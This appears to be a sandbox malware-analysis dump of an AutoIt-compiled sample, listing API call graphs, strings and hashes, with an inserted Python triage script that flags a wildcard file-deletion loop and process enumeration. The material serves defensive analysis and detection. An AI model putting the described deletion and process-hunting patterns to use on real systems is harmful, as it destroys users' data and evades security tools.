100966->100965 100969 281821 59 API calls 100966->100969 100970 2add46 100967->100970 100971 290fe6 Mailbox 59 API calls 100968->100971 100969->100965 100974 274fd4 100970->100974 100975 281207 59 API calls 100970->100975 100972 274fbb 100971->100972 100972->100970 100973 274fc6 100972->100973 100973->100974 100976 281a36 59 API calls 100973->100976 100974->100857 100974->100859 100975->100974 100976->100974 100978 28410a 2 API calls 100977->100978 100979 2841f7 100978->100979 100980 28410a 2 API calls 100979->100980 100981 28420b 
100980->100981 100981->100874 100983 2d7c8a 100982->100983 100984 290fe6 Mailbox 59 API calls 100983->100984 100985 2d7c91 100984->100985 100986 2d7c9d 100985->100986 100987 2d7cbe 100985->100987 100988 290fe6 Mailbox 59 API calls 100986->100988 100989 290fe6 Mailbox 59 API calls 100987->100989 100990 2d7ca6 _memset 100988->100990 100989->100990 100990->100886 100991->100861 100992->100885 100993->100888 100994->100889 100995->100859 100996->100859 100997->100906 100998->100906 101000 2d7cf1 100999->101000 101001 290fe6 Mailbox 59 API calls 101000->101001 101002 2d7cf8 101001->101002 101005 2d6135 101002->101005 101004 2d7d3b Mailbox 101004->100942 101006 281aa4 59 API calls 101005->101006 101007 2d6148 CharLowerBuffW 101006->101007 101009 2d615b 101007->101009 101008 2d6165 _memset Mailbox 101008->101004 101009->101008 101010 2d6195 101009->101010 101012 281609 59 API calls 101009->101012 101011 2d61a7 101010->101011 101013 281609 59 API calls 101010->101013 101014 290fe6 Mailbox 59 API calls 101011->101014 101012->101009 101013->101011 101018 2d61d5 101014->101018 101017 2d6233 101017->101008 101020 290fe6 Mailbox 59 API calls 101017->101020 101019 2d61f4 101018->101019 101038 2d6071 59 API calls 101018->101038 101023 2d6292 101019->101023 101021 2d624d 101020->101021 101022 290fe6 Mailbox 59 API calls 101021->101022 101022->101008 101024 281207 59 API calls 101023->101024 101025 2d62c4 101024->101025 101026 281207 59 API calls 101025->101026 101027 2d62cd 101026->101027 101028 281207 59 API calls 101027->101028 101034 2d62d6 _wcscmp 101028->101034 101029 281821 59 API calls 101029->101034 101030 293836 GetStringTypeW 101030->101034 101031 28153b 59 API calls 101031->101034 101033 2937ba 59 API calls 101033->101034 101034->101029 101034->101030 101034->101031 101034->101033 101035 2d6292 60 API calls 101034->101035 101036 2d65ab Mailbox 101034->101036 101037 281c9c 59 API calls 101034->101037 101039 29385c GetStringTypeW _iswctype 101034->101039 101035->101034 
101036->101017 101037->101034 101038->101018 101039->101034 101040 2b01f8 101041 2b01fa 101040->101041 101044 2d4d18 SHGetFolderPathW 101041->101044 101045 281821 59 API calls 101044->101045 101046 2b0203 101045->101046 101047 27107d 101052 282fc5 101047->101052 101049 27108c 101050 292f70 __cinit 67 API calls 101049->101050 101051 271096 101050->101051 101053 282fd5 __ftell_nolock 101052->101053 101054 281207 59 API calls 101053->101054 101055 28308b 101054->101055 101056 2900cf 61 API calls 101055->101056 101057 283094 101056->101057 101083 2908c1 101057->101083 101060 281900 59 API calls 101061 2830ad 101060->101061 101062 284c94 59 API calls 101061->101062 101063 2830bc 101062->101063 101064 281207 59 API calls 101063->101064 101065 2830c5 101064->101065 101066 2819e1 59 API calls 101065->101066 101067 2830ce RegOpenKeyExW 101066->101067 101068 2c01a3 RegQueryValueExW 101067->101068 101071 2830f0 Mailbox 101067->101071 101069 2c0235 RegCloseKey 101068->101069 101070 2c01c0 101068->101070 101069->101071 101082 2c0247 _wcscat Mailbox __NMSG_WRITE 101069->101082 101072 290fe6 Mailbox 59 API calls 101070->101072 101071->101049 101073 2c01d9 101072->101073 101075 28433f 59 API calls 101073->101075 101074 281609 59 API calls 101074->101082 101076 2c01e4 RegQueryValueExW 101075->101076 101077 2c0201 101076->101077 101079 2c021b 101076->101079 101078 281821 59 API calls 101077->101078 101078->101079 101079->101069 101080 281a36 59 API calls 101080->101082 101081 284c94 59 API calls 101081->101082 101082->101071 101082->101074 101082->101080 101082->101081 101084 2a1b70 __ftell_nolock 101083->101084 101085 2908ce GetFullPathNameW 101084->101085 101086 2908f0 101085->101086 101087 281821 59 API calls 101086->101087 101088 28309f 101087->101088 101088->101060

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0028526C
                                                                            • IsDebuggerPresent.KERNEL32 ref: 0028527E
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002852E6
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                              • Part of subcall function 0027BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0027BC07
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00285366
                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 002C0B2E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 002C0B66
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00326D10), ref: 002C0BE9
                                                                            • ShellExecuteW.SHELL32(00000000), ref: 002C0BF0
                                                                              • Part of subcall function 0028514C: GetSysColorBrush.USER32(0000000F), ref: 00285156
                                                                              • Part of subcall function 0028514C: LoadCursorW.USER32(00000000,00007F00), ref: 00285165
                                                                              • Part of subcall function 0028514C: LoadIconW.USER32(00000063), ref: 0028517C
                                                                              • Part of subcall function 0028514C: LoadIconW.USER32(000000A4), ref: 0028518E
                                                                              • Part of subcall function 0028514C: LoadIconW.USER32(000000A2), ref: 002851A0
                                                                              • Part of subcall function 0028514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002851C6
                                                                              • Part of subcall function 0028514C: RegisterClassExW.USER32(?), ref: 0028521C
                                                                              • Part of subcall function 002850DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00285109
                                                                              • Part of subcall function 002850DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0028512A
                                                                              • Part of subcall function 002850DB: ShowWindow.USER32(00000000), ref: 0028513E
                                                                              • Part of subcall function 002850DB: ShowWindow.USER32(00000000), ref: 00285147
                                                                              • Part of subcall function 002859D3: _memset.LIBCMT ref: 002859F9
                                                                              • Part of subcall function 002859D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00285A9E
                                                                            Strings
                                                                            • runas, xrefs: 002C0BE4
                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 002C0B28
                                                                            • AutoIt, xrefs: 002C0B23
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                            • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                            • API String ID: 529118366-2030392706
                                                                            • Opcode ID: 0af4da0232c257dee5d8a490ae07144fb51a10ffd997de30170f9b01f1bae98d
                                                                            • Instruction ID: 0ef7f12a70ba1e6d9d08514598e4c821d0bd3c705249c4a8a20b56958250f032
                                                                            • Opcode Fuzzy Hash: 0af4da0232c257dee5d8a490ae07144fb51a10ffd997de30170f9b01f1bae98d
                                                                            • Instruction Fuzzy Hash: A4512978926259ABCB13FBB0DC95EEE7B7CAF05740F104599F451A21E2CAB01935CF21

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00290284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00282A58,?,00008000), ref: 002902A4
                                                                              • Part of subcall function 002D4FEC: GetFileAttributesW.KERNEL32(?,002D3BFE), ref: 002D4FED
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 002D3D96
                                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 002D3E3E
                                                                            • MoveFileW.KERNEL32(?,?), ref: 002D3E51
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 002D3E6E
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 002D3E90
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 002D3EAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 4002782344-1173974218
                                                                            • Opcode ID: 5814975d829a022a369342cbfabda9a7ce9d26d1e663ef08a602305a55e44f31
                                                                            • Instruction ID: ef87fc088c6b33ddbd1224418fb7fb7a095d77308d3452d9d5c4919ce3ccbc06
                                                                            • Opcode Fuzzy Hash: 5814975d829a022a369342cbfabda9a7ce9d26d1e663ef08a602305a55e44f31
                                                                            • Instruction Fuzzy Hash: E551713582215DAACF15FBA0D9929EDB77DAF10300F204166E445B72D2DB316F2ACF61

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 00285D40
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • GetCurrentProcess.KERNEL32(?,00300A18,00000000,00000000,?), ref: 00285E07
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00285E0E
                                                                            • GetNativeSystemInfo.KERNEL32(00000000), ref: 00285E54
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00285E5F
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00285E90
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00285E9C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                            • String ID:
                                                                            • API String ID: 1986165174-0
                                                                            • Opcode ID: c0c24afd0403238c33f38a6fb990f10c06ccd5c1b058a2838ec2a9795842b6c0
                                                                            • Instruction ID: e897d8546136e8cddbac3b93b8d5b818254f276f08cbdf368e66a5aa3dd5941b
                                                                            • Opcode Fuzzy Hash: c0c24afd0403238c33f38a6fb990f10c06ccd5c1b058a2838ec2a9795842b6c0
                                                                            • Instruction Fuzzy Hash: 3091173556ABD0DEC731DF7884515ABFFE56F2A300F880A5ED4C783A82D230A568C759

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00290284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00282A58,?,00008000), ref: 002902A4
                                                                              • Part of subcall function 002D4FEC: GetFileAttributesW.KERNEL32(?,002D3BFE), ref: 002D4FED
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 002D407C
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 002D40CC
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 002D40DD
                                                                            • FindClose.KERNEL32(00000000), ref: 002D40F4
                                                                            • FindClose.KERNEL32(00000000), ref: 002D40FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: f359e975859c80305b16d3a51023d359a030512043886c8c4130ad48996d06b5
                                                                            • Instruction ID: 333ca199e0a5adcf74a7503708641cdfdc4cfe533a586b588328db0b3b3e9b98
                                                                            • Opcode Fuzzy Hash: f359e975859c80305b16d3a51023d359a030512043886c8c4130ad48996d06b5
                                                                            • Instruction Fuzzy Hash: 18318F350293459BC305FF60D8919AFB7ACBE95301F400A1EF8D5822D2DB309D29CB53
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 002D416D
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 002D417B
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 002D419B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002D4245
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: eef84552d9ecdebbbd7dce0dd7b4d81c9af606991a7a7a76118675f1ce0da8a3
                                                                            • Instruction ID: 7e508733715bb5acad70f0168dea3731e57c84fa876c1f4b8be706c8bd40523a
                                                                            • Opcode Fuzzy Hash: eef84552d9ecdebbbd7dce0dd7b4d81c9af606991a7a7a76118675f1ce0da8a3
                                                                            • Instruction Fuzzy Hash: AC318D751183419BD305EF50D885BAEBBECAF95350F40052EF985822E1EB709A69CB92
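The two function blocks above (the FindFirstFileW / DeleteFileW / FindNextFileW loop keyed on the \*.* string, and the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW walk) are the parts of this dump a triager actually cares about: one wipes every entry of a directory, the other enumerates running processes, which is the primitive behind the report's "Search for Antivirus process" signature. The block below is an added example, not code from the report or from the sample; it parses API lines in the exact shape Joe Sandbox prints them here (bullet, optional "Part of subcall function" prefix, module.function(args), ref: address), recovers call order from the call-site addresses, and flags the two patterns. The sample input is retyped from the two blocks above; the regular expressions and the two behaviour labels are this example's own assumptions. Caveat for detection authors: the later blocks in this dump carry the strings `AutoIt v3 GUI` and `Software\AutoIt v3\AutoIt`, which are the AutoIt v3 runtime's own, so the delete loop is most likely the runtime's wildcard FileDelete helper rather than logic specific to this sample; a rule keyed on this function alone would match every AutoIt-compiled binary.

```python
import re
from dataclasses import dataclass

# Constructed sample input, retyped from the two function blocks discussed in
# this report in the shape Joe Sandbox prints them: a bullet, optionally
# "Part of subcall function <addr>:", then module.function(args), ref: <addr>.
SAMPLE_DIRWIPE = r"""
  • Part of subcall function 00290284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00282A58,?,00008000), ref: 002902A4
  • Part of subcall function 002D4FEC: GetFileAttributesW.KERNEL32(?,002D3BFE), ref: 002D4FED
• FindFirstFileW.KERNEL32(?,?), ref: 002D407C
• DeleteFileW.KERNEL32(?,?,?,?), ref: 002D40CC
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 002D40DD
• FindClose.KERNEL32(00000000), ref: 002D40F4
• FindClose.KERNEL32(00000000), ref: 002D40FD
• String ID: \*.*
"""

SAMPLE_PROCWALK = r"""
• CreateToolhelp32Snapshot.KERNEL32 ref: 002D416D
• Process32FirstW.KERNEL32(00000000,?), ref: 002D417B
• Process32NextW.KERNEL32(00000000,?), ref: 002D419B
• CloseHandle.KERNEL32(00000000), ref: 002D4245
• String ID:
"""


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: tuple
    ref: int        # call-site address, used to recover call order
    subcall: bool   # True for "Part of subcall function" lines (callee code)


# Assumed line format, derived from the lines printed in this report.
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_STR_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*)$")


def parse_function_block(text):
    """Parse one function's API lines and String ID field. APIs come back
    sorted by call-site address, i.e. in straight-line disassembly order."""
    apis, strings = [], []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if m:
            args = tuple(a for a in (m.group("args") or "").split(",") if a)
            apis.append(ApiRef(m.group("api"), m.group("mod"), args,
                               int(m.group("ref"), 16), m.group("sub") is not None))
            continue
        m = _STR_RE.match(line)
        if m:
            # Joe Sandbox joins several strings with "$" in the String ID field
            strings.extend(s for s in m.group("s").split("$") if s)
    apis.sort(key=lambda a: a.ref)
    return apis, strings


def classify(apis, strings):
    """Map the ordered direct-call sequence onto the two behaviours seen in
    this report. Subcall lines are ignored: they belong to callee functions."""
    direct = [a.api for a in apis if not a.subcall]
    findings = []
    if {"FindFirstFileW", "DeleteFileW", "FindNextFileW"} <= set(direct):
        first = direct.index("FindFirstFileW")
        delete = direct.index("DeleteFileW")
        nxt = direct.index("FindNextFileW")
        # DeleteFileW sitting between FindFirst and FindNext is the body of an
        # enumeration loop: every matching entry is deleted, not a single file.
        if first < delete < nxt:
            wildcard = any("*.*" in s for s in strings)
            findings.append("wildcard directory wipe" if wildcard
                            else "delete inside enumeration loop")
    if {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= set(direct):
        findings.append("process enumeration (Toolhelp32 walk)")
    return findings


def triage(text):
    """Convenience wrapper: one report block in, list of behaviour labels out."""
    return classify(*parse_function_block(text))


if __name__ == "__main__":
    for name, block in (("2d4005", SAMPLE_DIRWIPE), ("2d4150", SAMPLE_PROCWALK)):
        print(name, triage(block))
```

Sorting on the ref address rather than trusting the printed order matters because Joe Sandbox lists subcall entries first regardless of where they execute; the sort also makes the "DeleteFileW between FindFirstFileW and FindNextFileW" loop test meaningful.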
                                                                            APIs
                                                                              • Part of subcall function 00283740: CharUpperBuffW.USER32(?,003371DC,00000002,?,00000000,003371DC,?,002753A5,?,?,?,?), ref: 0028375D
                                                                            • _memmove.LIBCMT ref: 0027B68A
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 2819905725-0
                                                                            • Opcode ID: 122cc302cb5febb4857a5c3c597d7ca5e62966500dc6b1206d59834a0a86093f
                                                                            • Instruction ID: 320f9a55277d4cb39b8dd0734a50ce66094cbd89bdbe137967ff5db45ffc9bbc
                                                                            • Opcode Fuzzy Hash: 122cc302cb5febb4857a5c3c597d7ca5e62966500dc6b1206d59834a0a86093f
                                                                            • Instruction Fuzzy Hash: D5A28875628342CFC721DF28C480B6AB7E1BF88304F14895DE89A8B261D771ED65CB82
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,002BFC86), ref: 002D495A
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 002D496B
                                                                            • FindClose.KERNEL32(00000000), ref: 002D497B
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                            • String ID:
                                                                            • API String ID: 48322524-0
                                                                            • Opcode ID: b2bccf379ee47cf74709a079da58a57cf508d38638c07ed7367daa0b62bd733b
                                                                            • Instruction ID: c5a3e1ad73a0f0890f9fa8a40ca5ab160d3f85725cbd4b71adbdc4c35cec4ee7
                                                                            • Opcode Fuzzy Hash: b2bccf379ee47cf74709a079da58a57cf508d38638c07ed7367daa0b62bd733b
                                                                            • Instruction Fuzzy Hash: A6E0DF31821506ABC2187B38EC1D9EA775C9F06339F100B07F835C22E0EBB09D5486D6
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 247fd83532d0524f7bc0bc7ce9770fe589c53fd37bfd7d095acfe5435a6a1b50
                                                                            • Instruction ID: 2591c3259f1ab415c499dcc9ac6cfa9eb9456a7b487c780335083af2aa7605c9
                                                                            • Opcode Fuzzy Hash: 247fd83532d0524f7bc0bc7ce9770fe589c53fd37bfd7d095acfe5435a6a1b50
                                                                            • Instruction Fuzzy Hash: 1722AD74A20316CFDB24DF58C480AAEB7B4FF05300F14C169E95AAB351E771ADA5CB91
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 0027BF57
                                                                              • Part of subcall function 002752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002752E6
                                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 002B36B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePeekSleepTimetime
                                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                            • API String ID: 1792118007-922114024
                                                                            • Opcode ID: cf5db71f0987cc1755b7e82009a418491d83d8f7f214487848808aa8908bfa7a
                                                                            • Instruction ID: 25beef44c08a89a36990e96c1aacccfd93d77017ad8f061cb770832e5e10e323
                                                                            • Opcode Fuzzy Hash: cf5db71f0987cc1755b7e82009a418491d83d8f7f214487848808aa8908bfa7a
                                                                            • Instruction Fuzzy Hash: 32C2B270628342DFD729DF24C894BAAB7E5BF84344F14891DF48A972A1CB71E964CF42

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00273444
                                                                            • RegisterClassExW.USER32(00000030), ref: 0027346E
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0027347F
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 0027349C
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002734AC
                                                                            • LoadIconW.USER32(000000A9), ref: 002734C2
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002734D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: 57bb3bb933c3b1822791e9b1d4f37231d76e3d289fd3bad24158bd26170a8c2b
                                                                            • Instruction ID: c4f82fee5c0fa9dcf19268142e4965243186cdbd8b9605d257d34bc2bb94750b
                                                                            • Opcode Fuzzy Hash: 57bb3bb933c3b1822791e9b1d4f37231d76e3d289fd3bad24158bd26170a8c2b
                                                                            • Instruction Fuzzy Hash: C63167B1805309EFDB128FA4D889BC9BFF8FF09320F10415AE580EA2A0D7B90585CF50

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00273444
                                                                            • RegisterClassExW.USER32(00000030), ref: 0027346E
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0027347F
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 0027349C
